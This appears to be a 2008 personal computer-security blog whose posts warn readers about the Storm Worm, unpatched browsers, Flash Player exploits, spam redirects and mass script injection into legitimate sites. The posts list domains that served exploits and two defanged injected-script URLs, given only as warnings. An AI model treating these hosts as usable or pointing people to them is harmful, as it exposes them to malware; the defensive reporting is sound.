Computer Security Weblog

Well Happy 4th of July to all the folks here in the US.  Hope everyone has a safe one today.  Just a little warning.  The Storm Worm still lives and as expected, a wave of e-mails trying to get you to download an executable called fireworks.exe.  Just remember, do not click on links or attachments in unsolicited e-mails.  Click here for the Internet Storm Center story relating to this subject.

Happy 4th everyone!!

Read this story on usatoday.com basically backing up why bad guys can take advantage of millions of web surfers out there.  Click here for the usatoday story.  I guess I should not complain because this reinforces why I feel that I have job security.  Anyway, here are the scary stats.  If you get one thing out of this posting, please use a patched browser.  Patching is one of the simplest things to do but so many don’t do it for one reason or another.

here is an excerpt from a story linked from the usatoday.com article.  This is from the website securitywatch.eweek.com:

While many of us will spend the better part of our adult lives sitting at computers, and more specifically keeping our eyes trained on the cyber-crime ecosystem, can we really expect people who do not to constantly remember to go download new software releases?

According to the researchers, “at most 83.3 percent of Firefox users, 65.3 percent of Safari users, 56.1 percent of Opera users and 47.6 percent of Internet Explorer users were using the latest, most secure browser version on any day between January 2007 [and] June 2008.”

The Firefox number is actually quite surprising. The idea that less than 50 percent of the estimated 577 million people using IE are not on current versions really is not. Firefox users tend to be more technically savvy, as many have specifically sought out the browsers for themselves. Most of the people using IE have it installed on their machines by default.

Based on this information, it’s no wonder why the criminal attacker is so successful.  I’m thinking about downloading Opera and testing it as another more secure browser.  I use Firefox along with add on’s to improve my security.  No way can you be 100 % secure.  There will always be those zero-day attacks that no patching can help.  Responding quickly to vulnerabilities is the reason why I use the Ubuntu operating system.

That is it for this post.  Lots of fireworks going off tonight, so the high price of gas hasn’t slowed too many folks from buying fireworks.  Sure has affected me and my 4th of July spending habits.  Have a great Thursday and stay safe.

A little vacation is a really good thing.  But I’m back now and since I haven’t posted too much this month, thought I could inform you of a couple of things.  Attackers go to where the numbers are.  And with Wimbledon Tennis coming up, the ATP site was attacked with those nasty injectioin attacks.  Be careful out there folks.  It’s a scary world we live in.

Thought I might tell you that Adobe has an update to the PDF reader that almost everyone has so open the reader up and click on Help, then select the Check for Update option.  If you aren’t patched, patch now.  Attackers depend on you not updating your software.

It’s getting hotter and more humid in the middle of the heartland of America.  Stay cool, stay safe, and have a safe celebration with the 4th of July coming next week!

Adobe Flash Player made a lot of headlines last week.  Well the injections of sites exploiting the Flash Player has increased to over 800,000.  Doing a Google search on com/b.js has 825,000 pages indexed.  It is being hosted on many domains, some have been noted in this blog and others.  After all the shakeout, it was determined that the current Flash Player (9.0.124.0) is not vulnerable.  So as I’ve stated in the past, patch, patch, patch.  This time it’s the Adobe Flash Player.

Click here to check which version of Adobe Flash Player is installed on your PC.  If it is not the current version listed above, then download and install it now.  Stay safe as we are now over the hump for the week. Can’t wait till the weekend!  Rock Chalk Jayhawk!!!

A vulnerability has been reported in Adobe Flash Player versions 9.0.124.0 and older, which is the current version available for download now. Adobe has not yet released a patch nor an official advisory. Symantec has also said that this vulnerability is currently being exploited by the bad guys as we speak. Soon they will have an update out but at this point, it is up to you to protect yourself. Don’t click on unsolicited links or attachments in spam e-mail. Your behavior can go a long way in protecting yourself when on the Internet.

Stay safe and have a great Wednesday!

UPDATE Wednesday, May 28, 2008 16:30 CST

Well as the day went on, it was found that current release of Adobe Flash Player ( 9.0.124.0) is not vulnerable to the attacks that are ongoing at this time. Here is a list of the nasty sites serving up the exploits. WARNING!! Do not visit these sites no matter what!!

tongji123.org
bb.wudiliuliang.com
user1.12-26.net
user1.12-27.net
ageofconans.net
lkjrc.cn
psp1111.cn
zuoyouweinan.com
user1.isee080.net
guccime.net
woai117.cn
wuqing17173.cn
dota11.cn
play0nlnie.com
0novel.com

UPDATE: 053008

Well this story has more turns in it than a NASCAR event.  Some are even right turns.  First we thought all versions of Adobe Flash Player were vulnerable.  Then we are told that the current version is OK and not vulnerable.  Then, Adobe doesn’t come right out and say it and Symantec is saying that these exploits are working so just be careful out there.  Seems that the bad guys are using these in new SQL injection attacks.  Have a great Friday!!

A new twist to on old scam, I had someone report SPAM e-mail that was sent that appeared to come from Microsoft. A quick little research online led me to know this has been around for a few years but it has a different twist.

As you can see, this was the entire body of the e-mail.  Nothing to sell.  No e-cards to click on.  No official document from some bogus US Court.  Just 3 innocent looking links from everyone’s friend Microsoft. The text makes you think you subscribed to MSN Featured Offers and they are being kind enough to add an Unsubscribe link. Since you never really subscribed to this in the first place, they are hoping to get people to click the Unsubscribe link so they won’t have this sent anymore.  All because they respect your privacy. Taking a closer look at the 3 links, they all lead you to the same URL. The IP for the URL was registered in the USA. A quick Google search of the domain showed a lot of Russian language found on references to this domain.  After taking a closer look, all this URL did was to redirect you to a site that was registered in Korea. This gives you a little more insight on how SPAM e-mail can be a threat.  If this trail would have been followed all the way through, exploits for Microsoft, QuickTime, RealPlayer, and possibly Adobe Reader would have run against the PC and if it were not patched, then remote code execution could be possible, meaning the PC would have been added to someone’s criminal botnet and used in nefarious ways.

Remember what we say, never click on unsolicited links or attachments in e-mail.  Stay safe.

The Shadowserver.org does great work and informs the security community on the darker side of the Internet. In their most recent posting, they have listed the sites that are serving up the malicious content. Here is the list of sites and the number of sites injected with each of these malicious domains.  Please be advised….DO NOT VISIT ANY OF THESE SITES.

I work in computer security.  We see a lot of attacks from some bad people.  What trends are we seeing and what will attacks look like in the near future?  Here are my thoughts.  I read a lot of tech sites, I listen to tech podcasts, and you hear a lot of opinions.  The biggest trend this year will be legitimate sites being hacked and malicious code actually injected into them so they actually serve up attacks on unknowing visitors.

We started seeing this trend in early 2007 with the Super Bowl from Dolphin’s Stadium.  Then it got quiet until the end of the year and then things have picked up.  Things are going to get worse.  Malicious tool kits can be bought on the Internet and you can change the attacks as new ones are found and old ones are patched.  This attack vector very efficient.  Some attacks can affect hundreds of thousands of pages in a short period of time.

What is going to come in the not so far future in computer security?  I believe those who say that different types of hardware other than the actual PC will be targeted soon.  Routers being controlled by attackers who can use a form of DNS poisoning where they can direct you to their bad paypal.com.  You won’t be able to tell you aren’t really on the real paypal.com site.  These hardware devices need to be secured and upgraded with security updates too.  Let me ask you a question about your router you use in your home.  When was the last time logged into that wireless router you own and update the firmware?  Never?  I’m sure there have been updates.  Learn how to maintain all devices that you have.

I feel pretty secure surfing the web but I take steps avoid going to places and I use as many things to help defend against those evil criminal attackers out on the Internet.  Patch.  It’s simple and a huge step in the right direction.  I read a lot.  I try sharing it with you.  The common man or woman does not keep up with all the threats out there.  The one resource I would start to read is the Internet Storm Center.  They are sort of a warehouse of information relating to threats on the net and what you can do to protect yourself.

That is it for now.  The weekend is getting so close I can taste it.  Stay safe and have a happy Thursday.

Most of the time, attacks from the Internet are silent.  You may not have realized that clicking on your favorite web site silently redirected you to a server in China and then exploits from Microsoft’s Internet Explorer, Firefox, QuickTime, Realplayer, and other applications are run on your PC. If you haven’t patched all your software, some bad guy attacker might just be able to take control of your machine and then be able to execute code remotely.  Those are words you really don’t want to hear.

Eventually, your anti-virus vendor gets the signatures of the bad software loaded on your machine and can clean it off.  But how did it get there?  What do I use my PC for?  Do I bank online?  Do I access my investment accounts online?  Do I store personal information about myself or my family in a document saved on the PC’s hard drive?  Then you need to take steps in trying to figure out just what happened.

First of all, is your software patched?  If not, then download your patches from Microsoft, Apple, RealPlayer, or any other applications and apply those security patches.  Set up a process in making sure your PC is scanned regularly and you check for patches regularly.

Can you find out if sites you visit have been hacked?  Sometimes you won’t know unless you really follow stories posted online.  If it is a big name site like CNN.com or USAToday.com, then you might know.  Hundreds of thousands of sites get hacked and you never really know.  You could possibly defend against these attacks by using a tool called NoScript with your Firefox browser.

Do you store passwords for sites so when you browse to them?  Are any of those holding a credit card of yours?  If you’ve read my blog much, I advise you not use the function that will remember passwords to sites.

One thing you will have to remember.  The Internet was not set up to handle secure transactions.  It was set up to share information.  Bad guys are taking advantage of all the vulnerabilities out there.  I can not guarantee you will be completely safe even following all these steps.  You can follow best practices and be safer than the average person.  If you have teenagers, your battle will be an uphill fight.  Teenagers trust everyone.  Clicking things that need not be clicked.  Think about having a computer you adults use, then one that the teenagers use.  You’ll still have to fight off attacks on the teenagers PC.

Good luck and stay safe.  I’m ready for SUMMER!!!

Yep, you are reading that headline right. Yet another code injection attack that is new. Just prior to writing this post, it showed 855,000 pages infected with some malicious (BAD!!) code that was injected into legitimate sites. NoScript is one defense, since this code is hosted on another domain.

The attack that I wrote about that started last week just hasn’t really taken off. Doing a Google search shows 25,500 pages that were affected by this one. It is early in the game for both of these attacks so more details will come out later. I’ll do more checking on the current attacks to see where those bad sites are being hosted.

The two sites in this new attack are listed below.  I’ve altered the URL.  My advice is NOT to go to either of these sites.

hxxp://free.hostpinoy.info/f.js
hxxp://xprmn4u.info/f.js

Stay safe and HAPPY MOTHER’S DAY!!!